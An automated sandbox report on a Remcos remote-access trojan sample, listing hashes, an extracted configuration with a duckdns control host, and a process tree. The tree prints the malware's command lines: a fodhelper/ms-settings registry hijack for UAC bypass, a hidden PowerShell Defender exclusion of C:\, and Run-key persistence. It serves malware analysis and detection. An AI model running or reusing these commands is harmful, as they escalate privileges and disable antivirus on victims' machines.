Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
25-07-2024 08:09
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.exe
-
Size
1.0MB
-
MD5
101d89bad85d7a2cee47414f3ca875a4
-
SHA1
e4fbc5f86ccf69b70c02d63ab6b6d025f0106542
-
SHA256
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3
-
SHA512
c9fd3e12dbb636a54e8710bde6c82ef8a39d162b870fbc0f32f1a695c1a757a9a8153bad08650a1093165e566e35127f883e2c6690e7395aaa507e74c5036982
-
SSDEEP
24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLJ:DDcCZfx+GQRjj1mO
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:45645
127.0.0.1:56765
latestgrace2024.duckdns.org:56765
latestgrace2024.duckdns.org:45645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2ZXBPR
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 19 IoCs
Processes:
ioeztdcY.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2236 ioeztdcY.pif 2332 alpha.exe 2604 alpha.exe 2564 alpha.exe 2468 alpha.exe 2876 alpha.exe 1688 alpha.exe 1212 xkn.exe 2012 alpha.exe 1620 ger.exe 1964 alpha.exe 332 alpha.exe 1796 alpha.exe 328 alpha.exe 2276 alpha.exe 2008 alpha.exe 2208 alpha.exe 1160 alpha.exe 2616 alpha.exe -
Loads dropped DLL 15 IoCs
Processes:
MalwareBazaar.execmd.exealpha.exexkn.exealpha.exepid process 2076 MalwareBazaar.exe 2076 MalwareBazaar.exe 2880 cmd.exe 2880 cmd.exe 2880 cmd.exe 2880 cmd.exe 2880 cmd.exe 2880 cmd.exe 1688 alpha.exe 1212 xkn.exe 1212 xkn.exe 1212 xkn.exe 2012 alpha.exe 2880 cmd.exe 2880 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
MalwareBazaar.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ycdtzeoi = "C:\\Users\\Public\\Ycdtzeoi.url" MalwareBazaar.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MalwareBazaar.exedescription pid process target process PID 2076 set thread context of 2236 2076 MalwareBazaar.exe ioeztdcY.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MalwareBazaar.exeioeztdcY.pifextrac32.execolorcpl.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MalwareBazaar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ioeztdcY.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEpid process 332 alpha.exe 1944 PING.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1268 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exeMalwareBazaar.exepid process 1212 xkn.exe 2076 MalwareBazaar.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1212 xkn.exe Token: SeDebugPrivilege 1268 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MalwareBazaar.exeioeztdcY.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2076 wrote to memory of 2236 2076 MalwareBazaar.exe ioeztdcY.pif PID 2236 wrote to memory of 2880 2236 ioeztdcY.pif cmd.exe PID 2236 wrote to memory of 2880 2236 ioeztdcY.pif cmd.exe PID 2236 wrote to memory of 2880 2236 ioeztdcY.pif cmd.exe PID 2236 wrote to memory of 2880 2236 ioeztdcY.pif cmd.exe PID 2880 wrote to memory of 2924 2880 cmd.exe extrac32.exe PID 2880 wrote to memory of 2924 2880 cmd.exe extrac32.exe PID 2880 wrote to memory of 2924 2880 cmd.exe extrac32.exe PID 2880 wrote to memory of 2332 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2332 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2332 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2604 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2604 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2604 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2564 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2564 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2564 2880 cmd.exe alpha.exe PID 2564 wrote to memory of 2600 2564 alpha.exe extrac32.exe PID 2564 wrote to memory of 2600 2564 alpha.exe extrac32.exe PID 2564 wrote to memory of 2600 2564 alpha.exe extrac32.exe PID 2880 wrote to memory of 2468 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2468 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2468 2880 cmd.exe alpha.exe PID 2468 wrote to memory of 2612 2468 alpha.exe extrac32.exe PID 2468 wrote to memory of 2612 2468 alpha.exe extrac32.exe PID 2468 wrote to memory of 2612 2468 alpha.exe extrac32.exe PID 2880 wrote to memory of 2876 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2876 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 2876 2880 cmd.exe alpha.exe PID 2876 wrote to memory of 1336 2876 alpha.exe extrac32.exe PID 2876 wrote to memory of 1336 2876 alpha.exe extrac32.exe PID 2876 wrote to memory of 1336 2876 alpha.exe extrac32.exe PID 2880 wrote to memory of 1688 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1688 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1688 2880 cmd.exe alpha.exe PID 1688 wrote to memory of 1212 1688 alpha.exe xkn.exe PID 1688 wrote to memory of 1212 1688 alpha.exe xkn.exe PID 1688 wrote to memory of 1212 1688 alpha.exe xkn.exe PID 1212 wrote to memory of 2012 1212 xkn.exe alpha.exe PID 1212 wrote to memory of 2012 1212 xkn.exe alpha.exe PID 1212 wrote to memory of 2012 1212 xkn.exe alpha.exe PID 2012 wrote to memory of 1620 2012 alpha.exe ger.exe PID 2012 wrote to memory of 1620 2012 alpha.exe ger.exe PID 2012 wrote to memory of 1620 2012 alpha.exe ger.exe PID 2880 wrote to memory of 1964 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1964 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1964 2880 cmd.exe alpha.exe PID 1964 wrote to memory of 1268 1964 alpha.exe taskkill.exe PID 1964 wrote to memory of 1268 1964 alpha.exe taskkill.exe PID 1964 wrote to memory of 1268 1964 alpha.exe taskkill.exe PID 2880 wrote to memory of 332 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 332 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 332 2880 cmd.exe alpha.exe PID 332 wrote to memory of 1944 332 alpha.exe PING.EXE PID 332 wrote to memory of 1944 332 alpha.exe PING.EXE PID 332 wrote to memory of 1944 332 alpha.exe PING.EXE PID 2880 wrote to memory of 1796 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1796 2880 cmd.exe alpha.exe PID 2880 wrote to memory of 1796 2880 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Public\Libraries\ioeztdcY.pifC:\Users\Public\Libraries\ioeztdcY.pif2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2137.tmp\2138.tmp\2139.bat C:\Users\Public\Libraries\ioeztdcY.pif"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:2924
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:2332 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2604 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:2600
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:2612
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:1336
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:1620 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1944 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:1796 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:328 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:2276 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2008 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2208 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1160 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2616 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF2⤵
- System Location Discovery: System Language Discovery
PID:540 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe2⤵
- System Location Discovery: System Language Discovery
PID:1304
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
146B
MD511538990d7ee70ce7472909c7c4ddc4c
SHA1adb469a739bdb496891bc521b59898d0120e5b49
SHA2566950b338af0986588db10fd8116a3268e9e5483db5b0e40c0f6ca5aa7fbded5c
SHA51203903cf1da30bb56c751a4274c37572800428a4437fbd7feda4362b7a0a8e3aaec261f9f7d68e253efdc013ce22cf35fad7cbbfa1a20e3b77232f66779a44b5c
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d